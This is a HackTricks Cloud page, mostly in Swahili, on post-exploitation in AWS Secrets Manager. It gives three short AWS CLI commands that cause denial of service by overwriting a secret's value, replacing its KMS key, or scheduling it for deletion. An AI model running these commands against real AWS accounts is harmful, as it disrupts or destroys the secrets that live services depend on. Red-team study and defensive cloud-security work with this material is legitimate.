AWS - Secrets Manager Post Exploitation

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Usimamizi wa Siri

Kwa maelezo zaidi angalia:

Soma Siri

Siri zenyewe ni taarifa nyeti, angalia ukurasa wa privesc kujifunza jinsi ya kuzisoma.

DoS Badilisha Thamani ya Siri

Kubadilisha thamani ya siri unaweza DoS mfumo wote unaotegemea thamani hiyo.

Kumbuka kwamba thamani za awali pia zimehifadhiwa, hivyo ni rahisi kurudi kwenye thamani ya awali.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Badilisha funguo la KMS

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Kuondoa Siri

Idadi ya chini ya siku za kuondoa siri ni 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - S3 Post Exploitation NextAWS - SES Post Exploitation

Last updated 3 days ago